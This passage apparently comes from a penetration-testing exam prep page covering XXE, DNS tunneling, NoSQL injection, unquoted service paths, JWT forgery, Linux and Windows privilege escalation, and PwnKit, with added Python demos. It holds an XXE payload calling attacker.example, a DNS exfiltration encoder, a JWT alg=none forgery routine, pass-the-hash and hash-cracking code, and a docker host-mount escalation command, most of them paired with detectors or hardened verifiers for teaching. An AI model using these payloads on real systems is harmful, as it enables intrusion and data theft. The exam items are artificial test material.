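BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("a1b2c3d4e5f60718") + b"\x00" * 4


def demo() -> dict:
    stored_nt = nt_hash(PASSWORD)                 # what the target server holds for alice
    chal1 = bytes.fromhex("0123456789abcdef")     # server challenge, session 1
    # 1. Legitimate logon: the client derives the NT hash from the typed password.
    legit = ntlmv2_response(nt_hash(PASSWORD), USER, DOMAIN, chal1, BLOB)
    # 2. Pass-the-hash: the attacker dumped only the NT hash (e.g. from LSASS), never the password.
    dumped_nt = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    pth = ntlmv2_response(dumped_nt, USER, DOMAIN, chal1, BLOB)
    # 3. Replaying a captured NetNTLMv2 response against a new session fails: fresh challenge.
    chal2 = bytes.fromhex("fedcba9876543210")
    return {
        "legit_accepted": server_verify(stored_nt, USER, DOMAIN, chal1, legit),
        "pth_accepted": server_verify(stored_nt, USER, DOMAIN, chal1, pth),
        "replay_accepted": server_verify(stored_nt, USER, DOMAIN, chal2, legit),
        "cracked": crack_netntlmv2(USER, DOMAIN, chal1, legit, ["winter2024", "Password1", "password"]),
    }


if __name__ == "__main__":
    print(demo())
```

The relay case in question 29 is the third scenario turned around: the relay tool does not replay the saved response, it obtains the target's challenge first and has the victim compute the response over that challenge, which is why it only works while the victim is authenticating.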

30
Multi-Selecthard

Which TWO of the following are indicators that a web application is vulnerable to XML External Entity (XXE) attacks? (Select TWO.)

Select 2 answers
A.Directory traversal in file upload functionality
B.Persistent cross-site scripting in user profiles
C.Exfiltration of files via HTTP requests to an attacker-controlled server
D.Application crashes when processing a malformed XML file
E.Successful UNION-based SQL injection
AnswersC, D

XXE can use external entities to send the contents of local files to the attacker.

Why this answer

Option C is correct because XXE lets an attacker define an external entity that references a local file (e.g., file:///etc/passwd) and then have that entity's content included in an HTTP request to an attacker-controlled server, typically via a parameter entity that loads an attacker-hosted DTD. This out-of-band exfiltration is a classic indicator of successful XXE exploitation, and it works even when the application never displays the parsed value. Option D is correct because an application that crashes on a malformed XML file shows that user-supplied XML reaches a server-side parser without schema validation or hardening; on its own it proves only that the parser is exposed, so it should be confirmed with a test document that declares a DTD.

Exam trap

CompTIA often tests the distinction between direct indicators of XXE (like file exfiltration via HTTP and parser crashes) and other common web vulnerabilities, so candidates mistakenly select directory traversal or SQL injection because they associate 'file reading' or 'data extraction' with XXE without recognizing the specific XML parser behavior.
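The parser-level view of question 30, as an added example that is not part of the page: record the DOCTYPE and entity declarations an XML document carries without resolving anything (detection), and refuse any DTD before content is processed (hardening). The two payloads and the attacker host name are constructed test documents.

```python
"""Spot and block XXE at the parser: inspect DOCTYPE/entity declarations with expat,
and refuse any DTD before content is processed. Added example, not from the page;
the payloads below are constructed and attacker.example is a placeholder host."""
import xml.parsers.expat

# Classic in-band XXE: the entity body would become the file content.
XXE_FILE = """<?xml version="1.0"?>
<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<order><item>&xxe;</item></order>"""

# Out-of-band variant (the option C indicator): a parameter entity pulls an external
# DTD that, in a real attack, carries the file out in a request to the attacker's host.
XXE_OOB = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  %remote;
]>
<order><item>1</item></order>"""

BENIGN = "<order><item>1</item></order>"


class DtdRejected(Exception):
    pass


def inspect_entities(doc: str) -> dict:
    """Detection: record every DOCTYPE, entity declaration and external reference
    without resolving anything (returning 1 from the ref handler means 'handled, skip')."""
    found = {"doctype": None, "entities": [], "external_refs": [], "error": None}
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal):
        found["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        found["entities"].append((name, bool(is_param), sysid))

    def on_ext_ref(context, base, sysid, pubid):
        found["external_refs"].append(sysid)  # a vulnerable parser would fetch sysid here
        return 1

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_ext_ref
    try:
        p.Parse(doc, True)
    except xml.parsers.expat.ExpatError as e:
        found["error"] = str(e)  # a parser error on odd input is itself a signal (option D)
    return found


def is_xxe_attempt(doc: str) -> bool:
    """Any entity declared with a SYSTEM/PUBLIC identifier is an external entity."""
    return any(sysid is not None for _, _, sysid in inspect_entities(doc)["entities"])


def parse_hardened(doc: str) -> list:
    """Hardening: a DOCTYPE aborts parsing before any entity can be declared.
    Returns the element names seen, as a stand-in for real processing."""
    names = []
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal):
        raise DtdRejected(f"DOCTYPE {name!r} not allowed")

    p.StartDoctypeDeclHandler = on_doctype
    p.StartElementHandler = lambda name, attrs: names.append(name)
    p.Parse(doc, True)
    return names


if __name__ == "__main__":
    for label, doc in (("file", XXE_FILE), ("oob", XXE_OOB), ("benign", BENIGN)):
        print(label, is_xxe_attempt(doc), inspect_entities(doc)["entities"])
```

Rejecting the DTD outright is the same policy defusedxml applies (forbid_dtd); it also closes the billion-laughs entity-expansion denial of service that needs no external entity at all.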

31
MCQhard

A penetration tester has exploited a web application and found that the server has an outbound firewall that restricts all outbound traffic except for DNS queries (UDP 53). The tester has a reverse shell payload that connects back on TCP 443. Which technique can the tester use to exfiltrate data or establish a channel?

A.Use netcat to send data over TCP 53
B.Use an SSH tunnel over UDP 53
C.Use dnscat2 or other DNS tunneling tool
D.Use a bind shell listening on TCP 443 internally
AnswerC

DNS tunneling encodes data in DNS queries, which are permitted by the firewall. This allows the tester to establish a channel and exfiltrate data.

Why this answer

Option C is correct because DNS tunneling tools such as dnscat2 (or iodine) encode data inside DNS queries and responses, so the tunnel rides the one protocol the firewall permits. The reverse shell on TCP 443 is blocked, but a query for a name under a domain the tester controls is forwarded by the organization's own resolver to the tester's authoritative name server; the tool encodes outbound data in the query name (base32 or hex labels) and receives commands in the answer (TXT, CNAME or MX records). This works even when only the internal resolver, not arbitrary Internet hosts, is reachable on UDP 53, which is what defeats the raw-socket alternatives in the other options.

Exam trap

The trap here is that candidates may assume any protocol can be tunneled over UDP 53 simply by changing the port, but DNS tunneling requires specialized tools that encapsulate data within DNS message formats, not just raw TCP or SSH over UDP.

How to eliminate wrong answers

Option A is wrong because the firewall allows UDP 53 only; TCP 53 is a different transport and is blocked, and even a raw `nc -u` datagram to port 53 is not a DNS message, so it is dropped by any DNS-aware filter or by a resolver that only forwards well-formed queries. Option B is wrong because SSH runs over TCP; there is no UDP transport for SSH, so an 'SSH tunnel over UDP 53' cannot be established. Option D is wrong because a bind shell listens on the target and waits for an inbound connection from the tester; whether that connection can reach the host depends on inbound filtering, and in any case it does nothing to move data out through the outbound restriction that is the problem here.
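How a tunnel of the dnscat2 kind fits data into query names, as an added example (not the page's content and not dnscat2's own code): the encoder splits a payload into base32 labels under a controlled zone, the packet builder shows what the resolver forwards, the decoder is what the attacker's name server does, and the last function is the crude label-length and entropy check a defender can run over DNS logs. The zone name and payload are constructed.

```python
"""How a DNS tunnel fits data into query names, and what a defender can look for.
Added example, not part of the page or of any tunneling tool; the zone t.example.com
and the payload are constructed."""
import base64
import math
import struct
from collections import Counter

TUNNEL_DOMAIN = "t.example.com"   # hypothetical attacker-controlled zone
CHUNK = 35                        # 35 bytes -> 56 base32 chars, under the 63-char label limit
LABELS_PER_QUERY = 3              # 105 payload bytes per query, well under the 253-char name limit
SAMPLE_PAYLOAD = b"constructed sample: /etc/shadow contents would go here " * 3


def encode_payload(data: bytes, domain: str = TUNNEL_DOMAIN) -> list:
    """Client side: split data into names of the form <seq>.<b32>.<b32>.<b32>.<domain>."""
    names, per_query = [], CHUNK * LABELS_PER_QUERY
    for seq, off in enumerate(range(0, len(data), per_query)):
        piece = data[off:off + per_query]
        labels = [
            base64.b32encode(piece[i:i + CHUNK]).decode().rstrip("=").lower()
            for i in range(0, len(piece), CHUNK)
        ]
        name = ".".join([str(seq)] + labels + [domain])
        assert len(name) <= 253, "DNS name too long"
        names.append(name)
    return names


def decode_queries(names: list, domain: str = TUNNEL_DOMAIN) -> bytes:
    """Server side: strip the zone, order by sequence label, base32-decode the rest."""
    suffix, pieces = "." + domain, {}
    for name in names:
        if not name.endswith(suffix):
            continue  # not ours; a real server would answer it normally
        labels = name[:-len(suffix)].split(".")
        seq, chunks = int(labels[0]), labels[1:]
        pieces[seq] = b"".join(
            base64.b32decode(c + "=" * (-len(c) % 8), casefold=True) for c in chunks
        )
    return b"".join(pieces[i] for i in sorted(pieces))


def build_query(name: str, txid: int = 0x1337, qtype: int = 16) -> bytes:
    """Minimal DNS query (RFC 1035): header with RD set, one question, QTYPE 16 = TXT, class IN."""
    qname = b"".join(struct.pack("B", len(l)) + l.encode() for l in name.split(".")) + b"\x00"
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + qname + struct.pack(">HH", qtype, 1)


def parse_query_name(packet: bytes) -> str:
    """Extract QNAME from a query packet (plain queries carry no compression pointers)."""
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels)


def looks_like_tunnel(name: str) -> bool:
    """Crude detector: a long, high-entropy label plus many labels per name."""
    labels = name.split(".")
    longest = max(labels, key=len)
    counts = Counter(longest)
    entropy = -sum(c / len(longest) * math.log2(c / len(longest)) for c in counts.values())
    return len(longest) >= 30 and entropy > 3.0 and len(labels) >= 4


def demo() -> dict:
    names = encode_payload(SAMPLE_PAYLOAD)
    on_wire = [build_query(n) for n in names]       # what the internal resolver forwards
    seen = [parse_query_name(p) for p in on_wire]    # what a sensor or the attacker's server sees
    return {
        "queries": len(names),
        "recovered": decode_queries(seen),
        "flagged": [looks_like_tunnel(n) for n in seen],
        "benign_flagged": looks_like_tunnel("www.example.com"),
    }


if __name__ == "__main__":
    result = demo()
    print(result["queries"], "queries;", "payload intact:", result["recovered"] == SAMPLE_PAYLOAD)
```

Real tools add session IDs, acknowledgements and encryption, and carry the downstream channel in answer records; the shape that gives them away (many long, random-looking labels under one rarely seen domain) is what the detector keys on, and query volume per client to that domain is the other signal worth alerting on.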

32
MCQeasy

A penetration tester gains access to a web application that uses a MongoDB backend. The tester discovers that the search functionality directly interpolates user input into a NoSQL query without sanitization. Which technique should the tester use to extract data from the database?

A.SQL injection
B.NoSQL injection
C.LDAP injection
D.Command injection
AnswerB

This is the correct technique because the application uses MongoDB and directly interpolates user input into queries. NoSQL injection manipulates the query logic by injecting operators like $gt or $ne.

Why this answer

Option B is correct because the application uses MongoDB, a NoSQL database, and the search functionality directly interpolates user input into a NoSQL query without sanitization. This allows the tester to inject MongoDB query operators (e.g., $ne, $regex, $gt, or $where for server-side JavaScript) to change the query logic and extract data, which is the core of NoSQL injection. Unlike SQL injection, the technique targets MongoDB's JSON-based query syntax rather than SQL grammar; a typical case is a JSON body in which a string field is replaced by an object such as {"$ne": null}. The fix is to enforce the expected type on each input (reject objects and keys beginning with $ where a string is expected) and to build queries through a driver's parameterized APIs rather than string concatenation.

Exam trap

The trap here is that candidates see 'injection' and default to SQL injection (Option A) without recognizing that the backend is MongoDB, a NoSQL database, which requires a different injection technique using JSON operators rather than SQL syntax.

How to eliminate wrong answers

Option A is wrong because SQL injection targets relational databases using SQL syntax (e.g., SELECT, UNION), but MongoDB uses a document-based query language with JSON-like operators, not SQL. Option C is wrong because LDAP injection exploits Lightweight Directory Access Protocol queries (e.g., LDAP filters) to manipulate directory services, not NoSQL databases like MongoDB. Option D is wrong because command injection targets operating system commands (e.g., shell commands) via system calls, not database queries, and the vulnerability here is in the database query layer, not the OS.

33
MCQhard

A penetration tester has gained a low-privileged command shell on a Windows 10 system. The tester suspects there is a vulnerable service with an unquoted service path that can be exploited for privilege escalation. Which command should the tester use to identify all services with this vulnerability?

A.Get-Service | Format-List Name,PathName
B.reg query HKLM\SYSTEM\CurrentControlSet\Services\ /s /v ImagePath
C.sc query type= all state= all | findstr "SERVICE_NAME"
D.net start
AnswerB

Correct. This registry query recursively lists all services and their ImagePath values. The tester can then inspect paths that contain spaces and are not enclosed in quotes.

Why this answer

Option B is correct because the `reg query` command with the `/s` switch recursively searches the registry key `HKLM\SYSTEM\CurrentControlSet\Services` and prints the `ImagePath` value of each service. An unquoted service path vulnerability occurs when the `ImagePath` contains spaces and is not enclosed in quotes: when the service starts, CreateProcess tries each space-delimited prefix as an executable (for `C:\Program Files\Acme Tools\agent.exe`, first `C:\Program.exe`, then `C:\Program Files\Acme.exe`), so an attacker who can write to one of those locations gets code run in the service's context. This command retrieves the raw path strings exactly as stored, making it the most reliable way to find them. The output still needs filtering: a service is exploitable only if the path contains a space before the `.exe`, is unquoted, the tester can write to one of the directories Windows will search, and the service runs as a privileged account and can be restarted (or the host rebooted).

Exam trap

The trap here is that candidates expect `sc query` or `Get-Service` to show the path. `sc query` reports only names and states (`sc qc <name>` shows BINARY_PATH_NAME, but one service at a time), and `Get-Service` returns ServiceController objects with no PathName property, so neither lists every raw path in one pass; the registry `ImagePath` value is the exact string the Service Control Manager hands to CreateProcess, including any missing quotes.

How to eliminate wrong answers

Option A is wrong because `Get-Service` returns ServiceController objects, which have no PathName property (that property belongs to the Win32_Service WMI class, e.g., `Get-CimInstance Win32_Service | Select-Object Name,PathName`), so the PathName column in the Format-List output is simply empty. Option C is wrong because `sc query type= all state= all | findstr "SERVICE_NAME"` lists only service names, not their binary paths, so it cannot reveal unquoted service paths. Option D is wrong because `net start` lists the display names of running services and nothing about their executable paths.
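Triage of the `reg query` output from question 33, as an added example that is not part of the page: parse the dump, keep only unquoted paths with a space before the executable, skip paths under the Windows directory (rarely writable), and list the file names Windows would try first, which are the locations to test for write access. The registry dump and service names are constructed.

```python
"""Triage `reg query ... /s /v ImagePath` output for unquoted service paths.
Added example, not from the page; the registry dump and service names are constructed."""
import re

# Constructed sample of what
#   reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v ImagePath
# prints (blank line between keys, value lines indented).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AcmeAgent
    ImagePath    REG_EXPAND_SZ    C:\Program Files\Acme Tools\agent.exe -run

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BackupSvc
    ImagePath    REG_EXPAND_SZ    "C:\Program Files\Backup Suite\backupsvc.exe" --service

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\spoolsv.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\OldUpdater
    ImagePath    REG_SZ    C:\Tools\Old Updater\updater.exe
"""

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\(\S+)\s*$")
VALUE_RE = re.compile(r"^\s*ImagePath\s+REG_(?:EXPAND_)?SZ\s+(.*?)\s*$")


def parse_reg_output(text: str) -> dict:
    """Map service name -> raw ImagePath string exactly as stored in the registry."""
    services, current = {}, None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and current:
            services[current] = m.group(1)
    return services


def hijack_candidates(image_path: str) -> list:
    """Files CreateProcess tries before reaching the real binary of an unquoted path.

    For C:\\Program Files\\Acme Tools\\agent.exe -run Windows tries
    C:\\Program.exe, then C:\\Program Files\\Acme.exe, then the real file.
    """
    if image_path.startswith('"'):
        return []  # quoted: no ambiguity
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # the real executable is found here; what follows is arguments
        candidates.append(prefix + ".exe")
    return candidates


def find_unquoted(text: str, skip_windows_dir: bool = True) -> dict:
    """Services whose raw ImagePath is unquoted and has a space before the .exe,
    optionally ignoring %SystemRoot% paths, which unprivileged users cannot write to."""
    findings = {}
    for svc, path in parse_reg_output(text).items():
        lowered = path.lower()
        if skip_windows_dir and (lowered.startswith("%systemroot%") or "\\windows\\" in lowered):
            continue
        cands = hijack_candidates(path)
        if cands:
            findings[svc] = cands
    return findings


if __name__ == "__main__":
    for svc, cands in find_unquoted(SAMPLE_REG_OUTPUT).items():
        print(svc, "->", cands)
```

Each candidate path is then checked for write access to its parent directory (icacls on the host); a hit is only useful if the service runs as SYSTEM or another privileged account and the tester can trigger a restart. Paths written as `\??\C:\...` or `\SystemRoot\...` are not handled here.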

34
MCQhard

A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester captures a valid JWT from a user session. The JWT header contains a 'kid' (key ID) parameter. The tester suspects the application is vulnerable to a key injection attack via the 'kid' parameter. Which attack technique should the tester use to forge a valid JWT without knowing the secret key?

A.Set the algorithm header to 'none' (null signature attack).
B.Replace the 'kid' value with a path to a known file on the server (e.g., /dev/null) that contains predictable content.
C.Use a side-channel attack to extract the secret key.
D.Perform a timing attack to recover the secret key character by character.
AnswerA

If the server accepts tokens with algorithm 'none', it will skip signature verification, allowing the tester to forge any token.

Why this answer

Option A is correct because setting the header's alg to 'none' declares the token unsigned. A library that lets the token's own header choose the verification algorithm, instead of pinning it server-side, then skips signature checking altogether, so the tester can edit the payload (for example the user or role claim), set alg to none, leave the signature segment empty, and be accepted without ever learning the secret. Spelling variants such as 'None' or 'NONE' are sometimes needed when a library blocklists only the lowercase form.

Exam trap

The trap here is that candidates confuse the 'none' algorithm attack with the 'kid' injection attack (option B), but the question specifically asks for a technique to forge a token without knowing the secret key, which the 'none' attack achieves directly.

How to eliminate wrong answers

Option B is not the intended answer, though it is a real technique: when the server loads the signing key from a file path taken from 'kid', pointing kid at a file with known contents (such as /dev/null, which reads as empty) lets the tester sign a forged token with that known value. It still depends on path traversal being possible and on a predictable file, whereas the 'none' attack needs no key at all, which is why A is the answer the question wants. Option C is wrong because a side-channel attack (e.g., power analysis, electromagnetic leaks) is impractical against a remote web application and does not directly forge a JWT. Option D is wrong because a timing attack recovers the secret key by measuring response-time variations; it requires many requests and does not immediately forge a token (it is a key recovery method, not a forgery technique), and a constant-time signature comparison defeats it.

35
MCQmedium

An organization has a web application that stores session tokens in a cookie named 'auth_token'. The token is a base64-encoded JSON object containing the username, role, and expiration timestamp. Which attack is most likely to succeed if the encryption is not used?

A.Session replay
B.Cross-site request forgery
C.Cookie tampering
D.Session hijacking
AnswerC

The tester can decode the cookie, change values, and re-encode to escalate privileges.

Why this answer

Option C is correct because the session token is base64-encoded JSON with no encryption and, more importantly, no integrity protection: anyone can decode it, modify the claims (change the role to 'admin', extend the expiration timestamp), re-encode it and send it back, and the server trusts the client-supplied values. Base64 is a transport encoding, not a security control. The fix is a server-side session identifier, or a MAC or signature over the token (as a properly verified JWT provides) checked on every request; encryption alone would hide the contents but not stop modification unless an authenticated mode is used.

Exam trap

CompTIA often tests the distinction between encoding and encryption, and the trap here is that candidates confuse base64 encoding with actual security, assuming it protects the token's integrity or confidentiality.

How to eliminate wrong answers

Option A is wrong because session replay involves capturing and reusing a valid token unchanged, but the question focuses on the lack of encryption enabling modification, not reuse. Option B is wrong because cross-site request forgery (CSRF) exploits the user's authenticated session to perform unintended actions, not the ability to tamper with the cookie content itself. Option D is wrong because session hijacking typically involves stealing a valid session token (e.g., via XSS or network sniffing) and using it as-is, whereas the core vulnerability here is the ability to forge or alter the token's contents due to lack of encryption.
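The two integrity failures in questions 34 and 35 side by side, as an added example that is not part of the page: tampering with a base64-only 'auth_token' cookie, forging a JWT with alg set to none, a verifier that commits the classic mistake of letting the token's header choose the algorithm, and a strict verifier that pins HS256. The secret, claims and cookie values are constructed.

```python
"""Unsigned or unverified claims are attacker-controlled: base64 cookie tampering
(question 35) and the JWT alg=none bypass (question 34), beside a strict verifier.
Added example, not from the page; secret, claims and cookie values are constructed."""
import base64
import hashlib
import hmac
import json

SERVER_SECRET = b"constructed-hs256-secret"  # hypothetical server-side key


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


# --- question 35: an 'auth_token' cookie that is only base64(JSON) --------------
def tamper_cookie(cookie: str, **changes) -> str:
    """Decode, edit, re-encode. No key is needed because there is no MAC to defeat."""
    claims = json.loads(base64.b64decode(cookie))
    claims.update(changes)
    return base64.b64encode(json.dumps(claims).encode()).decode()


# --- question 34: HS256 issuance, the alg=none forgery, and two verifiers ------
def issue_jwt(claims: dict, secret: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def forge_alg_none(token: str, **changes) -> str:
    """Keep the payload, rewrite claims, declare alg=none, and drop the signature."""
    _, payload, _ = token.split(".")
    claims = json.loads(unb64url(payload))
    claims.update(changes)
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{b64url(json.dumps(claims).encode())}."


def verify_vulnerable(token: str, secret: bytes):
    """Trusts the token's own header to choose the algorithm (the classic bug)."""
    header, payload, sig = token.split(".")
    alg = json.loads(unb64url(header)).get("alg")
    if alg == "none":
        return json.loads(unb64url(payload))          # no signature check at all
    if alg == "HS256":
        expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, unb64url(sig)):
            return json.loads(unb64url(payload))
    return None


def verify_strict(token: str, secret: bytes):
    """Pins the algorithm server-side; the header is not allowed to negotiate it."""
    header, payload, sig = token.split(".")
    if json.loads(unb64url(header)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not sig or not hmac.compare_digest(expected, unb64url(sig)):
        return None
    return json.loads(unb64url(payload))


def demo() -> dict:
    cookie = base64.b64encode(
        json.dumps({"username": "bob", "role": "user", "exp": 1700000000}).encode()
    ).decode()
    evil_cookie = tamper_cookie(cookie, role="admin", exp=4102444800)
    token = issue_jwt({"sub": "bob", "role": "user"}, SERVER_SECRET)
    forged = forge_alg_none(token, role="admin")
    return {
        "cookie_role": json.loads(base64.b64decode(evil_cookie))["role"],
        "vulnerable_accepts_forgery": verify_vulnerable(forged, SERVER_SECRET),
        "strict_accepts_forgery": verify_strict(forged, SERVER_SECRET),
        "strict_accepts_genuine": verify_strict(token, SERVER_SECRET),
    }


if __name__ == "__main__":
    print(demo())
```

The cookie case and the alg=none case are the same defect: the server accepts claims it never verified. Pinning the algorithm is what current JWT libraries require (an explicit allowed-algorithms list); the same HMAC check applied to the cookie in question 35 is the minimal fix there.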

36
Multi-Selecthard

A tester has low-privilege shell access on a Linux server. Which two checks are most appropriate for local privilege escalation enumeration? (Choose 2.)

Select 2 answers
A.Review sudo privileges with sudo -l.
B.Find SUID binaries and inspect unusual or writable executables.
C.Run a full SYN scan of the public IP range.
D.Send phishing emails to the finance department.
AnswersA, B

Misconfigured sudo rules are a common privilege escalation path.

Why this answer

Option A is correct because `sudo -l` lists the commands the current user can execute with elevated privileges, which is a standard first step in privilege escalation enumeration. If the user may run any command as root without a password (NOPASSWD) or with a known password, and that command can spawn a shell or write arbitrary files, the result is full system compromise. Option B is correct because a binary with the SUID bit runs with its owner's effective UID, root for root-owned files; a SUID binary that is writable, unusual for the system, or known to be abusable (the kind catalogued on GTFOBins) lets the caller run code as root. Both checks are local and need nothing beyond the shell the tester already has.

Exam trap

The trap here is that candidates confuse network scanning or social engineering with local enumeration techniques, forgetting that the question explicitly states the tester already has low-privilege shell access on the target server.

37
MCQmedium

A penetration tester has gained a low-privileged shell on a Linux server. During enumeration, the tester discovers a binary with the SUID bit set that belongs to root and is known to have a buffer overflow vulnerability. What is the MOST effective next step to escalate privileges?

A.Use the binary to execute a command that changes the root password
B.Develop and execute a buffer overflow exploit against the binary to gain a root shell
C.Modify the binary's permissions to allow execution by any user
D.Use sudo to run the binary as root
AnswerB

This is the correct approach. Exploiting the SUID binary allows privilege escalation to root.

Why this answer

The SUID binary owned by root runs with an effective UID of 0 for whoever executes it, so a memory-corruption bug in it is a path to root. Developing and running a buffer overflow exploit against the binary redirects execution (by overwriting the return address or a function pointer, or with a ROP chain where the stack is non-executable) to code that calls setuid(0) and spawns a shell, escalating directly to root. The setuid call matters: many shells drop an effective UID that differs from the real UID unless the payload calls setuid(0) or setresuid first, or the shell is started with bash -p. This is the most effective method because it leverages the existing vulnerability without relying on other misconfigurations, although ASLR, stack canaries and NX on a modern system determine how much exploit development is required.

Exam trap

The trap here is that candidates may confuse SUID with sudo, assuming sudo can be used to run the binary as root, but SUID binaries execute with the owner's privileges automatically without requiring sudoers configuration.

How to eliminate wrong answers

Option A is wrong because changing the root password requires root privileges or the ability to write to /etc/shadow, which the low-privileged shell does not have; the SUID binary does not inherently provide a mechanism to execute arbitrary commands like passwd. Option C is wrong because modifying the binary's permissions (e.g., chmod) is not possible from a low-privileged shell, as the binary is owned by root and the SUID bit is already set; the goal is to exploit the binary, not change its permissions. Option D is wrong because sudo requires the user to be in the sudoers file with appropriate permissions, which a low-privileged user typically does not have; the SUID binary is executed directly, not via sudo.

38
MCQ · hard

A penetration tester gains a low-privileged shell on a Linux server and discovers that the user is a member of the 'docker' group. The tester wants to escalate privileges to root. Which technique is most effective?

A. Use cron job misconfigurations to execute a reverse shell
B. Exploit kernel vulnerabilities using a local exploit suggester
C. Run a Docker container with the host filesystem mounted and access it as root
D. Abuse SETUID binaries to execute commands as root
Answer: C

By running a Docker container with the host filesystem mounted (e.g., `docker run -v /:/mnt -it alpine chroot /mnt`), the user can access all host files as root because Docker effectively runs as root. This bypasses normal privilege restrictions.

Why this answer

Option C is correct because members of the 'docker' group can run Docker containers with the `-v /:/mnt` flag to mount the host filesystem into the container at `/mnt`. Inside the container the user effectively has root privileges (the container runs as root by default), so the host filesystem under `/mnt` is fully readable and writable: the user can modify files such as `/mnt/etc/shadow` or add an SSH key to `/mnt/root/.ssh/authorized_keys` to gain root access on the host.

Exam trap

CompTIA often tests the misconception that kernel exploits are always the fastest path to root, but the trap here is that membership in the 'docker' group is a trivial and reliable escalation vector that bypasses the need for kernel exploitation or other complex techniques.

How to eliminate wrong answers

Option A is wrong because cron job misconfigurations require write access to a cron directory or a user's crontab, which the low-privileged user does not have; the 'docker' group membership does not grant cron-related privileges. Option B is wrong because exploiting kernel vulnerabilities is a valid privilege escalation technique, but it is not the most effective here since the 'docker' group provides a direct, reliable, and less risky path to root without needing to match a specific kernel version or risk system instability. Option D is wrong because abusing SETUID binaries requires finding a binary with the SUID bit set that can be exploited (e.g., via a known vulnerability or misconfiguration), but the 'docker' group membership offers a more straightforward and guaranteed escalation path.

39
MCQ · hard

During an internal penetration test, a tester discovers a Windows server running a custom service that is vulnerable to a stack-based buffer overflow. The binary has Data Execution Prevention (DEP) enabled but Address Space Layout Randomization (ASLR) is disabled. Which exploitation technique would be MOST effective to achieve code execution?

A. Injecting shellcode directly onto the stack and overwriting the return address to jump to it
B. Using a return-to-libc attack to call system() with a command string
C. Constructing a ROP chain using gadgets from loaded DLLs to simulate shellcode execution
D. Enabling the execute bit on the stack via a memory corruption primitive
Answer: C

ROP allows arbitrary code execution by reusing existing code segments, effectively bypassing DEP when ASLR is disabled.

Why this answer

With DEP enabled, the stack is marked non-executable, so injecting shellcode directly (option A) would fail. ASLR being disabled means the addresses of loaded DLLs are predictable, making it feasible to construct a ROP chain using gadgets from those DLLs to simulate shellcode execution. Option C is correct because ROP chains bypass DEP by reusing existing executable code (gadgets) without needing to execute code on the stack.

Exam trap

The trap here is that candidates assume DEP can be bypassed simply by enabling execution on the stack (option D) without realizing that doing so requires a ROP chain or similar technique to call VirtualProtect, making option C the more direct and effective approach.

How to eliminate wrong answers

Option A is wrong because DEP prevents execution of code on the stack, so overwriting the return address to jump to injected shellcode will cause an access violation. Option B is wrong because a return-to-libc attack typically calls a single function like system() from libc, but on Windows the equivalent (e.g., calling system() from msvcrt) is limited; more importantly, return-to-libc cannot easily chain multiple function calls to achieve arbitrary shellcode behavior, whereas a ROP chain can. Option D is wrong because enabling the execute bit on the stack would require a separate memory corruption primitive to modify page permissions (e.g., via VirtualProtect), which itself would need to be called through ROP or similar; it is not a direct exploitation technique and is less effective than constructing a full ROP chain.

40
MCQ · medium

A penetration tester has successfully exploited a web application and gained a reverse shell as the www-data user on a Linux server. The tester wants to escalate privileges to root. The server is running a vulnerable version of polkit's pkexec (CVE-2021-4034). Which action should the tester take to exploit this vulnerability?

A. Execute the 'sudo -u root' command
B. Run the 'pkexec' binary with crafted environment variables
C. Modify the PATH environment variable to include a malicious executable
D. Use a generic kernel exploit for privilege escalation
Answer: B

The PwnKit vulnerability is triggered by running pkexec with specific environment variables (e.g., a modified PATH) that cause a buffer overflow, allowing privilege escalation.

Why this answer

Option B is correct because CVE-2021-4034 (PwnKit) is a memory corruption vulnerability in polkit's pkexec that allows an unprivileged user to escalate privileges to root by running the pkexec binary with crafted environment variables. Specifically, by setting the PATH and other environment variables to trigger an out-of-bounds write, the attacker can execute arbitrary code as root without authentication.

Exam trap

The trap here is that candidates may confuse this with a PATH hijacking attack (option C) or assume sudo is the default escalation method, but CVE-2021-4034 specifically requires crafted environment variables like GCONV_PATH, not just PATH modification.

How to eliminate wrong answers

